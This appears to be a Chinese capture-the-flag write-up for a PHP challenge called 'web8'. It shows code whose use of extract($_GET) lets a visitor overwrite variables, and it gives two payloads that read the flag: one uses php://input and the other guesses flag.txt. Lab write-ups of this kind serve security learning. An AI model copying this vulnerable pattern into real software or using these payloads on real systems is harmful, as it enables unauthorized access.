web8

简介: web8110txt????http://120.24.86.145:8002/web8/extract() -使用数组键名作为变量名,使用数组键值作为变量值。

web8
110
txt????
http://120.24.86.145:8002/web8/

<?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>
  • extract() -使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量.
  • empty()-判断一个变量是否被认为是空的。当一个变量并不存在,或者它的值等同于FALSE,那么它会被认为不存在。如果变量不存在的话,empty()并不会产生警告。
  • trim()-移除字符串两侧的空白字符或其他预定义字符。
  • file_get_contents-将整个文件读入一个字符串

可知,获取flag要使ac不为空,f 的值从文件fn中获取,并且ac===f


姿势1:构造payload:
url:?/ac=aa&&fn=php://input
post data :aa

姿势2 :猜测目录下有txt文件,测试出flag.txt。构造:
?ac=flags&fn=flag.txt

可得出flag


相关文章
|
6月前
|
安全 前端开发 PHP
LitCTF(web)
LitCTF(web)
50 3
|
4月前
|
XML 前端开发 JavaScript
Web的三个主要部分
Web的三个主要部分
863 1
|
7月前
|
移动开发 前端开发 JavaScript
Web2.0时代
Web2.0时代
53 4
|
JavaScript 算法 前端开发
Web APls-day04
Web APls-day04
100 0
|
JavaScript
Web APls-day03
Web APls-day03
100 0
|
JavaScript
Web APls-day02
Web APls-day02
|
区块链
Web 3.0,究竟是什么?
Web 3.0,究竟是什么?
166 0
|
存储 机器学习/深度学习 人工智能
Web3.0到底是什么?
Web3.0到底是什么?
185 0
|
前端开发 JavaScript
WEB简单回顾
对前端知识的简单回顾
|
存储 Web App开发 人工智能
带你了解什么是 Web3.0
1989年,CERN(欧洲粒子物理研究所)中TimBerners-Lee领导的技术小组提交了一个针对互联网的新协议和一个使用该协议的文档系统,该小组将该系统命名为WorldWideWeb,简称WWW(万维网),也就是我们现在熟知的“互联网”,它的目的在于使全球的科学家能够利用互联网来交流自己的工作文档。它采用的技术主要是HTML、URI、URL、HTTP等,可以通过静态的方式展示网页内容。通常来说,Web1.0指的是20世纪90年代和21世纪初的互联网。什么是Web3.0?
635 0